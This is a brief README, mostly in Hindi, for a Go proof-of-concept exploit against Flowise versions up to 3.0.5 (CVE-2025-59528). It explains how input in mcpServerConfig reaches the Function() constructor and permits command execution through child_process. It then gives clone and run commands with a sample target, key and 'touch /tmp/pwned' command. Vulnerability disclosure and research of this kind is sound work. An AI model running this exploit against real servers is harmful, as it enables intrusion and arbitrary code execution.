
Go Proof of Concept (PoC) exploit for Flowise CustomMCP Remote Code Execution (RCE) CVE-2025-59528
CVE-2025-59528 को लक्षित करने वाला Flowise संस्करण <= 3.0.5 के लिए एक Go प्रूफ ऑफ कॉन्सेप्ट।
Flowise CustomMCP नोड कॉन्फ़िगरेशन के माध्यम से अमान्य जावास्क्रिप्ट निष्पादन की अनुमति देता है। एप्लिकेशन mcpServerConfig पैरामीटर के अंदर उपयोगकर्ता द्वारा प्रदान किए गए इनपुट को बैकएंड convertToValidJSONString फ़ंक्शन के अंदर सीधे Function() कंस्ट्रक्टर में पास करता है। यह पूर्ण Node.js विशेषाधिकारों के साथ कोड का मूल्यांकन करता है, जिससे child_process के माध्यम से मनमाना सिस्टम कमांड निष्पादन की अनुमति मिलती है।
git clone https://github.com/Moon-Harvest/CVE-2025-59528
cd CVE-2025-59528/
go run main.go <target-base-url> <api-key> <command>
go run main.go http://target.com h3D_9jD7Xzi0V2KSrld9ff4P3rm6cuNXg1uA-wFsUYc "touch /tmp/pwned"